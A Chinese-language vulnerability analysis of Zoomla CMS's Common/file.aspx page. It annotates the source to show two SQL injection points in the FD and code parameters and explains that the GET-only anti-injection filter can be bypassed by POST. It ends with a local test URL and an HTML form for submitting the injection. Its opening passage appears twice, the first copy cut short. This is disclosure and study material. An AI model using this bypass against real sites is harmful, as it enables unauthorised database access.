<p>问题文件:\Common\file.aspx<br>注:此问题文件包含两个注入<br>参数:code<br>代码分析如下:</p><pre>protected void Page_Load(object sender, EventArgs e)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> string str = "http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/UploadFiles/" + this.ull.GetLogin(true).UserName;<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["code"] == null && base.Request.QueryString["FD"] != null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["ur"] == null && base.Request.QueryString["state"] == null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> string value = base.Server.UrlDecode(base.Request.QueryString["FD"]);<br style="margin: 0px; padding: 0px;"> this.FileUrl = this.FileJiema(value);<br style="margin: 0px; padding: 0px;"> this.hid.Value = base.Server.UrlDecode(base.Request.QueryString["FD"]);<br...
<p>问题文件:\Common\file.aspx<br>注:此问题文件包含两个注入<br>参数:code<br>代码分析如下:</p><pre>protected void Page_Load(object sender, EventArgs e)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> string str = "http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/UploadFiles/" + this.ull.GetLogin(true).UserName;<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["code"] == null && base.Request.QueryString["FD"] != null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["ur"] == null && base.Request.QueryString["state"] == null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> string value = base.Server.UrlDecode(base.Request.QueryString["FD"]);<br style="margin: 0px; padding: 0px;"> this.FileUrl = this.FileJiema(value);<br style="margin: 0px; padding: 0px;"> this.hid.Value = base.Server.UrlDecode(base.Request.QueryString["FD"]);<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> else<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["state"] == null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> string value2 = base.Request.QueryString["FD"].ToString().Replace(" ", "+");<br style="margin: 0px; padding: 0px;"> this.FileUrl = this.FileJiema(value2);<br style="margin: 0px; padding: 0px;"> this.hid.Value = value2;<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> if (base.Request["state"] != null && base.Request["state"] == "tr")<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> string value3 = base.Request.QueryString["FD"];/*第一种注入:带sql的Base64字符串*/<br style="margin: 0px; padding: 0px;"> this.FileUrl = this.FileJiema(value3);/*第一种注入:解码字符串FromBase64String(value));*/<br style="margin: 0px; padding: 0px;"> this.hid.Value = value3;<br style="margin: 0px; padding: 0px;"> this.file = this.bfile.SelectFile(string.Concat(new object[]<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> " FileName='",<br style="margin: 0px; padding: 0px;"> this.FileUrl,<br style="margin: 0px; padding: 0px;"> "' and userid=",<br style="margin: 0px; padding: 0px;"> this.ull.GetLogin(true).UserID<br style="margin: 0px; padding: 0px;"> }));/*第一种注入:this.bfile.SelectFile会直接代入sql注入*/<br style="margin: 0px; padding: 0px;"> if (this.file.DownUrl == null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> base.Response.Write("0");<br style="margin: 0px; padding: 0px;"> base.Response.End();<br style="margin: 0px; padding: 0px;"> return;<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> base.Response.Write("http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/Common/File.aspx?code=" + this.file.ExtractionCode);<br style="margin: 0px; padding: 0px;"> base.Response.End();<br style="margin: 0px; padding: 0px;"> return;<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> else<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["ur"] != null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> this.file.ExtractionCode = function.GetRandomString(8, 1);<br style="margin: 0px; padding: 0px;"> this.file.DownUrl = str + this.FileUrl;<br style="margin: 0px; padding: 0px;"> this.file.State = 1;<br style="margin: 0px; padding: 0px;"> this.file.UserID = this.ull.GetLogin(true).UserID;<br style="margin: 0px; padding: 0px;"> this.file.FileName = this.FileUrl;<br style="margin: 0px; padding: 0px;"> this.bfile.AddFile(this.file);<br style="margin: 0px; padding: 0px;"> base.Response.Write("http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/Common/File.aspx?code=" + this.file.ExtractionCode);<br style="margin: 0px; padding: 0px;"> base.Response.End();<br style="margin: 0px; padding: 0px;"> return;<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> else<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> /*第二种注入:比较简单 直接代入code参数*/<br style="margin: 0px; padding: 0px;"> if (base.Request.QueryString["code"] != "" && base.Request.QueryString["code"] != null)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> this.file = this.bfile.SelectFile(" ExtractionCode='" + base.Request.QueryString["code"] + "' ");<br style="margin: 0px; padding: 0px;"> base.Response.Redirect(this.file.DownUrl);/*然后跳转URL URL中不能包含换行符 所以我这里采用截取的方式以及拼接的方式*/<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> this.bfile.SelectFile方法代码如下:<br style="margin: 0px; padding: 0px;"> public M_File SelectFile(string where)<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> if (where == "")<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> this.sql = "select * from ZL_File";<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> else<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> this.sql = "select * from ZL_File where " + where;/*直接将条件带入 导入SQL注入 */<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> 略...<br style="margin: 0px; padding: 0px;"> }</pre><p>可以构造利用代码如下:<br>本地:<a href="http://192.168.1.100:8087/Common/File.aspx?code=" rel="nofollow">http://192.168.1.100:8087/Common/File.aspx?code=</a>'<br>但是这个时候访问会被sql注入拦截<br>那么我们看global中的拦截代码:</p><pre class=""> {<br style="margin: 0px; padding: 0px;"> if (base.Request.RequestType.ToUpper() == "GET" && ZoomlaSecurityCenter.GetData())<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> function.WriteMessage("产生错误的可能原因:你提交的参数不正确,包含恶意字符串,或检查系统是否开启了SQL防注入功能!", "", "非法SQL注入或存储!");<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> if (base.Request.HttpMethod.ToUpper() == "POST" && HttpContext.Current.Request.Files.Count > 0)/*我可以在这里通过post提交方式即可绕过*/<br style="margin: 0px; padding: 0px;"> {<br style="margin: 0px; padding: 0px;"> ZoomlaSecurityCenter.CheckUpladFiles();<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> }</pre><p>综合上面分析采用下面的方式绕过以及注入<br>建立一个form表单代码如下:</p><pre class=""><form id="form1" action="注入地址" method="post"><br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> <input type="submit" value="逐浪CMS 注入" /><br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> </form></pre><p>将URL填写到form中action中即可</p>
